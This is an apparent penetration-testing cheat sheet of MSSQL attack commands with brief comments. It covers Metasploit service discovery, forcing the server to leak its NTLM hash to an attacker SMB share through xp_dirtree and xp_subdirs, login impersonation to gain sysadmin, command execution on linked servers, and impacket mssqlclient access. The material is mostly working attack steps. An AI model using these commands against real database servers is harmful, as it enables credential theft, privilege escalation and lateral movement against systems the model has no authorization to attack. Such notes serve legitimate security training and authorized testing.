# MSSQL Ping in Metasploit using the mssql_ping auxiliary scanner
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts ip
msf6 auxiliary(scanner/mssql/mssql_ping) > run
Capture MSSQL Service Hash
# Start responder or impacket-smbserver
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
# XP_DIRTREE Hash Stealing
1> EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'
2> GO
# XP_SUBDIRS Hash Stealing
1> EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'
2> GO
Impersonate Existing Users with MSSQL
# Identify users that we can impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
# Verifying our current user and role
# 0 means we do not have the sysadmin role
# 1 means we have the sysadmin role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
# Impersonating the desired user
1> EXECUTE AS LOGIN = 'User'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Communicate with Other Databases with MSSQL
# Identify linked servers in MSSQL
# isremote = 1 means remote server, isremote = 0 means linked server
1> SELECT srvname, isremote FROM sysservers
2> GO
# Execute commands on a linked server using the EXECUTE ... AT statement
# '10.0.0.12\\SQLEXPRESS' is a linked server
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]
2> GO
# Finding mssqlclient.py
locate mssqlclient.py
/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py
# To connect to an MSSQL server with valid creds
python3 mssqlclient.py Administrator@ip -windows-auth
# Useful commands: <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/>
# To list the databases
select name from sys.databases